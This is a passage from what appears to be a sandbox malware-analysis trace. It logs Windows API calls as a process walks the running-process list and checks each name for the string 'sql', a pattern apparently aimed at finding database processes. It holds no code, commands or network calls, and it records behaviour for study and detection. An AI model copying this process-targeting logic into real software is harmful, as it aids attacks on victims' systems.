| out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.559] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3585060 [0176.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3585060, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0176.559] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0176.559] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0176.559] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.561] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584f88 [0176.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3584f88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0176.561] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0176.561] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0176.561] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.562] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584e50 [0176.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3584e50, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0176.562] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0176.562] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0176.562] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.563] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584fb8 [0176.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3584fb8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0176.564] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0176.564] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0176.564] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.565] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584eb0 [0176.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3584eb0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0176.565] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0176.565] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0176.565] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.566] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3585030 [0176.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3585030, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0176.567] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0176.567] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0176.567] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.568] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3585048 [0176.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3585048, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0176.568] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0176.568] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0176.568] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.569] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584f40 [0176.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3584f40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0176.569] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0176.569] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0176.569] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0176.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.570] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584ef8 [0176.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x3584ef8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0176.570] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0176.570] StrStrIA (lpFirst="spoolsv.exe", lpSrch="sql") returned 0x0 [0176.570] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.572] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3585078 [0176.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3585078, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0176.572] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0176.572] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0176.572] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0176.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.573] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584e08 [0176.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x3584e08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0176.573] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0176.573] StrStrIA (lpFirst="audiodg.exe", lpSrch="sql") returned 0x0 [0176.573] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0176.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0176.575] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3584f28 [0176.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x3584f28, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0176.575] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0176.575] StrStrIA (lpFirst="sihost.exe", lpSrch="sql") returned 0x0 [0176.575] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.576] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584f58 [0176.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3584f58, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0176.576] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0176.576] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0176.576] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0176.577] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0176.577] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3585090 [0176.577] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3585090, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0176.577] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0176.577] StrStrIA (lpFirst="taskhostw.exe", lpSrch="sql") returned 0x0 [0176.578] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0176.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0176.579] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3584fe8 [0176.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x3584fe8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0176.579] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0176.579] StrStrIA (lpFirst="explorer.exe", lpSrch="sql") returned 0x0 [0176.579] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0176.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0176.580] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35956e8 [0176.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x35956e8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0176.580] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0176.641] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="sql") returned 0x0 [0176.642] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0176.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0176.643] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x3586520 [0176.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x3586520, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0176.643] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0176.643] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="sql") returned 0x0 [0176.643] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0176.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0176.644] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3595988 [0176.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x3595988, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0176.644] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0176.644] StrStrIA (lpFirst="Memory Compression", lpSrch="sql") returned 0x0 [0176.645] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0176.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0176.646] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35850a8 [0176.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x35850a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0176.646] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0176.646] StrStrIA (lpFirst="SearchUI.exe", lpSrch="sql") returned 0x0 [0176.646] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0176.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0176.647] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3595788 [0176.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x3595788, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0176.647] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0176.647] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="sql") returned 0x0 [0176.647] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0176.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0176.648] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3584e98 [0176.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3584e98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0176.649] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0176.649] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="sql") returned 0x0 [0176.649] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0176.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.650] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584e38 [0176.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x3584e38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0176.650] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0176.650] StrStrIA (lpFirst="pending.exe", lpSrch="sql") returned 0x0 [0176.650] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0176.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0176.651] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x35863b8 [0176.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x35863b8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0176.651] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0176.651] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="sql") returned 0x0 [0176.651] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, 